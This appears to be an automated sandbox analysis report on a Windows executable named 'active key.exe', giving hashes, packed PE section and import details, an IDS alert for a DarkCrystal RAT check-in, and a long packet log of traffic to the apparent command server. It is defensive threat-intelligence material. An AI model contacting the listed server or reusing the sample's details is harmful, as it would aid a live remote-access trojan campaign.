                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):502
                                                            Entropy (8bit):4.618543484589417
                                                            Encrypted:false
                                                            SSDEEP:12:Pp5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:rdUOAokItULVDv
                                                            MD5:1111FE8E3F5AF574FABA8BC5B610148D
                                                            SHA1:97F131559F13C4A151D97F23065EE6E10E8F63F5
                                                            SHA-256:15300385CB48B1F8DA78180F2F772A2F89872019F54E9FFDBBE5FA188E1155EA
                                                            SHA-512:71163771D36565FA7E20D5391C6B8A71AC1F0779EF494709C49CFF8FFD182C6F10557E8E83889DC5EDD3F146B88E3E0AC0FCEF066B487F65E287B250A0B682BA
                                                            Malicious:false
                                                            Preview:..Pinging 971342 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                            Static File Info

                                                            General

                                                            File type:PE32+ executable (console) x86-64, for MS Windows
                                                            Entropy (8bit):7.980437803410312
                                                            TrID:
                                                            • Win64 Executable Console (202006/5) 92.65%
                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                            • DOS Executable Generic (2002/1) 0.92%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:active key.exe
                                                            File size:4'691'456 bytes
                                                            MD5:608de9b0cd5ec54b879965fddbbb9db6
                                                            SHA1:a3f0a61fd95098d0389f5e1f7f13850a19338e86
                                                            SHA256:03ee73148f5cbc60f1b281557d813ed9ba7a3097e99bdcf296df70a3777bd3c0
                                                            SHA512:1a28ea849787ea4f8ba1aa7cecf31fb6ccbdfaa7e1b7dfe89167cf1a2ce1d73a7aebeecf987e6628265e0eb1231b6fd567f43eb294d2773038ef541ea06e933e
                                                            SSDEEP:98304:QUbaFUETkqqT93mhTn+PQ0Bl4SyFFewX7N9iCwnVt8L9:QtFUHqqTI9+PQ0zyF0wX59mVt8L9
                                                            TLSH:AC2633EBF0968BE7C1414534625286B33B7B60684785A01C70ECDE987F9674D8F0A7AF
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u...u...u...|.;.c....CU.}....C..q....C.......C..Y....C..s....A..V...u................A..w....A..w...fD..f...fDW.t...fD..t..

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x140734bf5
                                                            Entrypoint Section:.vmp1
                                                            Digitally signed:false
                                                            Imagebase:0x140000000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x66982A60 [Wed Jul 17 20:32:32 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:e29cb7df0c6506c425797e8b10902aaa

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp 00007FE058B83F7Ah
                                                            dec ebp
                                                            push es
                                                            add al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp 00007FE058934B94h
                                                            jne 00007FE058B83FB1h
                                                            loopne 00007FE058B83F2Dh
                                                            xchg eax, edx
                                                            fstp tbyte ptr [ebx]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [IMP] VS2008 SP1 build 30729

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x9095d80x2bc.vmp1
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x93a0000x1e0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x9305a00x7f14.vmp1
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x9390000x59c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x7217900x28.vmp1
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x9304600x140.vmp1
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x72b0000x2b0.vmp1
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x7924c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x7b0000x1d2160x1d40040c71e8e0639c5d66030f286595fd72bFalse0.49366486378205127data6.250767296487164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x990000x1a34880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .pdata0x23d0000x53280x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .vmp00x2430000x2990170x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .vmp10x4dd0000x45b4b40x45b60033f5ce7fdc1b1897cac93860a39592deunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .reloc0x9390000x59c0x60048959b7f0ca6e96ae6fc8733d1c11870False0.5638020833333334data5.204436137432093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .rsrc0x93a0000x1e00x2002973a463c75f3eb9cb63c36a6ec0c104False0.5390625data4.772037401703051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0x93a0580x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllHeapReAlloc
                                                            USER32.dllMoveWindow
                                                            ADVAPI32.dllCryptDestroyHash
                                                            SHELL32.dllShellExecuteA
                                                            OLEAUT32.dllVariantClear
                                                            MSVCP140.dll?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEBAPEADXZ
                                                            SHLWAPI.dllPathFindFileNameW
                                                            PSAPI.DLLGetModuleInformation
                                                            ntdll.dllRtlCaptureContext
                                                            Normaliz.dllIdnToAscii
                                                            WLDAP32.dll
                                                            CRYPT32.dllCertOpenStore
                                                            WS2_32.dllWSAGetLastError
                                                            RPCRT4.dllUuidToStringA
                                                            USERENV.dllUnloadUserProfile
                                                            VCRUNTIME140.dllstrrchr
                                                            VCRUNTIME140_1.dll__CxxFrameHandler4
                                                            api-ms-win-crt-stdio-l1-1-0.dll_get_stream_buffer_pointers
                                                            api-ms-win-crt-runtime-l1-1-0.dll_initialize_narrow_environment
                                                            api-ms-win-crt-heap-l1-1-0.dll_set_new_mode
                                                            api-ms-win-crt-string-l1-1-0.dllstrncmp
                                                            api-ms-win-crt-time-l1-1-0.dllstrftime
                                                            api-ms-win-crt-math-l1-1-0.dllceilf
                                                            api-ms-win-crt-filesystem-l1-1-0.dll_stat64
                                                            api-ms-win-crt-convert-l1-1-0.dllatoi
                                                            api-ms-win-crt-environment-l1-1-0.dllgetenv
                                                            api-ms-win-crt-locale-l1-1-0.dlllocaleconv
                                                            api-ms-win-crt-utility-l1-1-0.dllqsort
                                                            WTSAPI32.dllWTSSendMessageW
                                                            KERNEL32.dllGetCurrentProcess
                                                            USER32.dllCharUpperBuffW
                                                            ADVAPI32.dllRegQueryValueExA
                                                            KERNEL32.dllLocalAlloc, GetCurrentProcess, GetCurrentThread, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, GetLastError, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
                                                            ADVAPI32.dllOpenSCManagerW, EnumServicesStatusExW, OpenServiceW, QueryServiceConfigW, CloseServiceHandle

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                            2024-09-02T13:33:41.567921+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14973280192.168.2.680.211.144.156

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 2, 2024 13:33:15.757886887 CEST49727443192.168.2.6104.26.0.5
                                                            Sep 2, 2024 13:33:15.757939100 CEST44349727104.26.0.5192.168.2.6
                                                            Sep 2, 2024 13:33:15.758014917 CEST49727443192.168.2.6104.26.0.5
                                                            Sep 2, 2024 13:33:15.768397093 CEST49727443192.168.2.6104.26.0.5
                                                            Sep 2, 2024 13:33:15.768428087 CEST44349727104.26.0.5192.168.2.6
                                                            Sep 2, 2024 13:33:16.218537092 CEST44349727104.26.0.5192.168.2.6
                                                            Sep 2, 2024 13:33:16.218653917 CEST49727443192.168.2.6104.26.0.5
                                                            Sep 2, 2024 13:33:16.231081963 CEST49727443192.168.2.6104.26.0.5
                                                            Sep 2, 2024 13:33:16.231105089 CEST44349727104.26.0.5192.168.2.6
                                                            Sep 2, 2024 13:33:16.231204987 CEST49727443192.168.2.6104.26.0.5
                                                            Sep 2, 2024 13:33:16.231260061 CEST44349727104.26.0.5192.168.2.6
                                                            Sep 2, 2024 13:33:16.231302977 CEST49727443192.168.2.6104.26.0.5
                                                            Sep 2, 2024 13:33:40.816819906 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:40.821630955 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:40.822134972 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:40.822514057 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:40.827284098 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:41.181931019 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:41.187273026 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:41.477550030 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:41.567852020 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:41.567867041 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:41.567920923 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:41.618441105 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:41.625276089 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:41.632292032 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:41.823301077 CEST4973380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:41.828514099 CEST804973380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:41.828574896 CEST4973380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:41.828704119 CEST4973380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:41.830750942 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:41.830955982 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:41.833503008 CEST804973380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:41.835891962 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.130362988 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.181035042 CEST4973380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:42.185920954 CEST804973380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.192636013 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:42.197407007 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.402674913 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.403249025 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:42.408150911 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.408432007 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.497225046 CEST804973380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.587193012 CEST4973380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:42.687994003 CEST804973380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.774694920 CEST4973380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:42.832403898 CEST4973380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:42.833389997 CEST4973480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:42.837733984 CEST804973380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.837800980 CEST4973380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:42.838157892 CEST804973480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:42.838413000 CEST4973480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:42.866833925 CEST4973480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:42.871648073 CEST804973480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:43.014805079 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:43.212471008 CEST4973480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.217361927 CEST804973480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:43.227832079 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.483005047 CEST804973480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:43.524693966 CEST4973480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.611737967 CEST804973480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:43.727828979 CEST4973480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.736027002 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.736105919 CEST4973480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.737405062 CEST4973580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.741179943 CEST804973280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:43.741255045 CEST4973280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.741734028 CEST804973480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:43.741777897 CEST4973480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.742862940 CEST804973580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:43.742933035 CEST4973580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.745134115 CEST4973580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:43.751334906 CEST804973580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:44.102916956 CEST4973580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:44.107825994 CEST804973580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:44.388576031 CEST804973580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:44.513240099 CEST804973580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:44.513295889 CEST4973580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:44.673480988 CEST4973580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:44.675720930 CEST4973680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:44.678570032 CEST804973580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:44.678662062 CEST4973580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:44.680567026 CEST804973680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:44.680677891 CEST4973680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:44.681550026 CEST4973680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:44.686374903 CEST804973680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:45.040632963 CEST4973680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:45.045562029 CEST804973680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:45.332659960 CEST804973680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:45.384083986 CEST4973680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:45.457918882 CEST804973680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:45.587204933 CEST4973680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:45.618756056 CEST4973680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:45.619530916 CEST4974080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:45.782109976 CEST804973680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:45.782166004 CEST4973680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:45.787177086 CEST804974080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:45.787187099 CEST804973680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:45.787264109 CEST4973680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:45.787275076 CEST4974080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:45.787583113 CEST4974080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:45.794568062 CEST804974080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:46.134427071 CEST4974080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:46.139297009 CEST804974080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:46.455176115 CEST804974080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:46.589682102 CEST804974080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:46.589746952 CEST4974080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:46.716408968 CEST4974080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:46.717242002 CEST4974180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:46.721580029 CEST804974080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:46.721664906 CEST4974080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:46.722033024 CEST804974180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:46.722107887 CEST4974180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:46.722269058 CEST4974180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:46.727169037 CEST804974180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:47.082544088 CEST4974180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:47.090194941 CEST804974180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:47.393899918 CEST804974180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:47.526725054 CEST804974180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:47.528665066 CEST4974180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:47.902373075 CEST4974180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:47.904181004 CEST4974280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:47.912537098 CEST804974280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:47.912550926 CEST804974180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:47.912615061 CEST4974280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:47.912636995 CEST4974180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:47.913032055 CEST4974280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:47.917892933 CEST804974280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.030056000 CEST4974380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.034977913 CEST804974380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.035037994 CEST4974380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.035248041 CEST4974380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.040091038 CEST804974380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.259388924 CEST4974280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.271337986 CEST804974280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.391341925 CEST4974380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.398873091 CEST804974380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.398889065 CEST804974380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.558787107 CEST804974280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.685179949 CEST804974280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.685240030 CEST4974280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.699379921 CEST804974380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.774701118 CEST4974380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.808568001 CEST4974280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.809616089 CEST4974480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.813666105 CEST804974280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.813839912 CEST4974280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.814452887 CEST804974480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.814660072 CEST4974480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.814795017 CEST4974480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:48.819545031 CEST804974480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:48.852103949 CEST804974380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:49.070574999 CEST804974380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:49.070683956 CEST4974380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:49.165401936 CEST4974480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:49.170269966 CEST804974480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:49.496167898 CEST804974480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:49.588524103 CEST4974480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:49.630851984 CEST804974480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:49.774708986 CEST4974480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:50.805850983 CEST4974380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:50.808739901 CEST4974480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:50.809999943 CEST4974580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:50.811525106 CEST804974380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:50.811788082 CEST4974380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:50.814560890 CEST804974480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:50.814609051 CEST4974480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:50.815466881 CEST804974580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:50.815553904 CEST4974580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:50.815675974 CEST4974580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:50.821252108 CEST804974580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:51.182663918 CEST4974580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:51.187716007 CEST804974580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:51.458148003 CEST804974580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:51.524713039 CEST4974580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:51.584599018 CEST804974580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:51.713115931 CEST4974580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:51.714545012 CEST4974680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:51.718369961 CEST804974580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:51.718430042 CEST4974580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:51.719371080 CEST804974680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:51.719438076 CEST4974680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:51.720474958 CEST4974680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:51.725359917 CEST804974680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:52.072122097 CEST4974680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:52.078139067 CEST804974680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:52.364274979 CEST804974680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:52.425002098 CEST4974680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:52.489216089 CEST804974680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:52.587232113 CEST4974680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:52.621536016 CEST4974680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:52.622816086 CEST4975280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:52.626820087 CEST804974680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:52.626878977 CEST4974680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:52.627639055 CEST804975280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:52.627705097 CEST4975280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:52.627821922 CEST4975280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:52.632919073 CEST804975280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:52.978007078 CEST4975280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:52.982862949 CEST804975280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:53.279985905 CEST804975280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:53.433914900 CEST4975280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.458178043 CEST804975280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:53.587201118 CEST4975280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.607244968 CEST4975280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.608580112 CEST4975380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.612935066 CEST804975280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:53.613006115 CEST4975280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.614288092 CEST804975380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:53.614377975 CEST4975380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.614917994 CEST4975380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.628119946 CEST804975380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:53.855459929 CEST4975580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.860254049 CEST804975580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:53.860340118 CEST4975580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.860596895 CEST4975580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.868303061 CEST804975580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:53.964237928 CEST4975380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:53.972923994 CEST804975380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:54.212327003 CEST4975580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:54.218425035 CEST804975580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:54.219175100 CEST804975580.211.144.156192.168.2.6
